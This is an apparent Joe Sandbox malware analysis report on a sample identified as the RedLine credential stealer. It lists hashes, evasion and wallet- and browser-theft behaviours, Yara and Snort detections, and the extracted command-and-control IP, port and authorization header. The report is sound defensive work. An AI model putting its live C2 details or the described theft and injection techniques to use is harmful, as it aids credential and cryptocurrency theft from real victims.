Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Installer.exe

Overview

General Information

Sample Name:Installer.exe
Analysis ID:791291
MD5:f62872fe4592273abda6f704fb27b3ec
SHA1:c9f193458f5b59a81b3fcb6fed90112d6d0dd48f
SHA256:8f136c424f604be973a76795d1de0dca7281ca25e543e264565d753e2dea404c
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Installer.exe (PID: 1228 cmdline: C:\Users\user\Desktop\Installer.exe MD5: F62872FE4592273ABDA6F704FB27B3EC)
    • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AppLaunch.exe (PID: 996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["82.115.223.46:57672"], "Authorization Header": "7352deef2adb5a71ae170f48b8b9de21"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.Installer.exe.13d4614.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.Installer.exe.13d4614.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x11c91:$v2_1: ListOfProcesses
                  • 0x11a70:$v4_3: base64str
                  • 0x125d6:$v4_4: stringKey
                  • 0x1038b:$v4_5: BytesToStringConverted
                  • 0xf59e:$v4_6: FromBase64
                  • 0x108b4:$v4_8: procName
                  • 0x11012:$v5_5: FileScanning
                  • 0x10594:$v5_7: RecordHeaderField
                  • 0x1025c:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  0.3.Installer.exe.1430000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.3.Installer.exe.1430000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0xd00:$pat14: , CommandLine:
                    • 0x13a91:$v2_1: ListOfProcesses
                    • 0x13870:$v4_3: base64str
                    • 0x143d6:$v4_4: stringKey
                    • 0x1218b:$v4_5: BytesToStringConverted
                    • 0x1139e:$v4_6: FromBase64
                    • 0x126b4:$v4_8: procName
                    • 0x12e12:$v5_5: FileScanning
                    • 0x12394:$v5_7: RecordHeaderField
                    • 0x1205c:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                    2.2.AppLaunch.exe.41c0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:82.115.223.46192.168.2.457672496972043234 01/25/23-09:37:20.266410
                      SID:2043234
                      Source Port:57672
                      Destination Port:49697
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.482.115.223.4649697576722043233 01/25/23-09:37:15.679519
                      SID:2043233
                      Source Port:49697
                      Destination Port:57672
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.482.115.223.4649697576722043231 01/25/23-09:37:33.121439
                      SID:2043231
                      Source Port:49697
                      Destination Port:57672
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Installer.exeVirustotal: Detection: 38%Perma Link
                      Antivirus detection for URL or domain
                      Source: http://tempuri.org/Entity/Id19ResponseonURL Reputation: Label: phishing
                      Machine Learning detection for sample
                      Source: Installer.exeJoe Sandbox ML: detected
                      Source: 0.2.Installer.exe.13d4614.1.unpackAvira: Label: TR/ATRAPS.Gen5
                      Source: 0.3.Installer.exe.1430000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["82.115.223.46:57672"], "Authorization Header": "7352deef2adb5a71ae170f48b8b9de21"}
                      Source: Installer.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09BA243Ah2_2_09BA2018
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09BA28BAh2_2_09BA2018
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09BA5A18h2_2_09BA5538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09BA1435h2_2_09BA1414

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49697 -> 82.115.223.46:57672
                      Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49697 -> 82.115.223.46:57672
                      Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 82.115.223.46:57672 -> 192.168.2.4:49697
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 82.115.223.46:57672
                      Source: Joe Sandbox ViewASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
                      Source: Joe Sandbox ViewIP Address: 82.115.223.46 82.115.223.46
                      Source: global trafficTCP traffic: 192.168.2.4:49697 -> 82.115.223.46:57672
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.115.223.46
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: AppLaunch.exe, 00000002.00000003.370355641.000000000492D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.365745204.000000000492C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
